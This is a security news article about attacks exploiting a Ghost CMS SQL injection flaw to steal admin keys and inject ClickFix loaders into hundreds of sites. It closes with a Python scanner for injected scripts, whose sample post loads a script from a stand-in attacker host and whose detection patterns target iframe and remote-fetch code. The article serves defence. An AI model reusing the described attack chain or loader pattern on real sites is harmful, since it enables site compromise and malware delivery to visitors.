A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows.
The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity firm Qianxin, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security websites, and personal blogs.
According to the researchers, threat actors planted malicious code on the websites of Harvard University, Oxford University, Auburn University, and DuckDuckGo.

Source: XLab
CVE-2026-26980 affects Ghost 3.24.0 through 6.19.0 and allows unauthenticated attackers to read arbitrary data from the website database, including the admin API keys.
This key gives administrative access to users, articles, and themes, and can be used to modify article pages.
Although the fix for the issue was released on February 19 in Ghost CMS version 6.19.1, many websites failed to install the security update.
SentinelOne published details on February 27 about CVE-2026-26980 being exploited in attacks and how incidents can be detected. The researchers observed at least two distinct activity clusters targeting vulnerable Ghost sites, often re-infecting the same domains with different scripts after cleanup, or one removing the other's script to inject its own.

Source: XLab
Attack chain
The attacks that XLab observed begin by exploiting CVE-2026-26980 to steal the admin API keys, and then use the elevated privileges to inject malicious JavaScript into articles.
The JavaScript code is a lightweight loader that fetches second-stage code from the attacker's infrastructure, which is essentially a cloaking script that fingerprints visitors to determine whether they qualify as targets.
Visitors passing the check are served a fake Cloudflare prompt loaded via an iframe on top of the article page, which contains the ClickFix lure.

Source: XLab
The page instructs victims to verify that they are human by pasting a provided command into their Windows command prompt, which drops a payload on their systems.
XLab has observed multiple payloads being used in these attacks, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.
Source: XLab
Mitigating the risk
The most important course of action for Ghost CMS website administrators is to upgrade to version 6.19.1 or later and rotate all keys used previously, as they may have been exposed.
XLab provided a list of indicators of compromise (IoCs), including injected scripts, so a thorough review of the websites is required to find and remove them.
The researchers recommend that website owners keep a 30-day record of admin API call logs to enable a reliable retrospective investigation.
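As an added example (not XLab's, SentinelOne's or Ghost's code) covering both the injected-loader behaviour described under Attack chain and the review for injected scripts recommended above: a small Python scan over exported post HTML that flags script elements a site's allowlist does not explain. The allowlist host, the sample post and the attacker domain are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this (hypothetical) site legitimately loads scripts from (constructed).
ALLOWED_HOSTS = {"cdn.example-site.test"}


class ScriptCollector(HTMLParser):
    """Collect every <script> element as {"src": str | None, "body": str}."""
    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})

    def handle_data(self, data):
        if self._in_script:  # HTMLParser delivers script bodies as raw data
            self.scripts[-1]["body"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def find_injected_scripts(post_html, allowed_hosts=ALLOWED_HOSTS):
    """Return (kind, detail) findings for scripts the allowlist does not explain:
    external scripts from an off-list host (the injected loader pulls its second
    stage from attacker infrastructure) and inline scripts that create an iframe
    or fetch remote code (how the fake Cloudflare prompt is overlaid)."""
    parser = ScriptCollector()
    parser.feed(post_html)
    findings = []
    for script in parser.scripts:
        if script["src"]:
            host = urlparse(script["src"]).hostname or ""
            if host not in allowed_hosts:
                findings.append(("external-script-offlist", script["src"]))
        elif any(m in script["body"] for m in ("iframe", "fetch(", "XMLHttpRequest")):
            findings.append(("inline-loader-pattern", script["body"].strip()))
    return findings


# Constructed sample post: one legitimate script, then two injected ones.
SAMPLE_POST = """<h1>Quarterly update</h1><p>Body text.</p>
<script src="https://cdn.example-site.test/analytics.js"></script>
<script src="https://loader.attacker.invalid/l.js"></script>
<script>document.body.appendChild(document.createElement('iframe'))</script>"""
```

Run it against every post exported from the Ghost admin; any finding is a candidate for the IoC comparison and removal step, and the post's edit history should then be checked against the admin API logs.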